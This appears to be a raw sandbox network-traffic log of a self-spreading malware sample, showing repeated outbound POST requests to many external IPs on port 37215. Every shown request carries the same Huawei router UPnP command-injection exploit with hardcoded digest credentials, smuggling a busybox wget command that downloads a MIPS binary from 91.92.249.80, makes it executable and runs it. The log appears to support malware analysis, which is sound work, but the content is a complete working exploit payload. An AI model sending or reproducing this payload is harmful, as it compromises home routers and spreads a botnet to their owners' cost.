                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1213192.168.2.234065083.186.181.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325679064 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1214192.168.2.2338858197.145.164.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325684071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1215192.168.2.2344410148.187.84.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325704098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1216192.168.2.235506841.8.25.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325737953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1217192.168.2.235237841.58.193.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325747967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1218192.168.2.2337114197.113.148.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325762987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1219192.168.2.2341532157.68.122.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325772047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1220192.168.2.2355316107.166.117.10937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325789928 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1221192.168.2.235794841.25.124.25037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325800896 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1222192.168.2.2341200157.155.221.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325813055 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1223192.168.2.2346840157.75.144.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326056957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
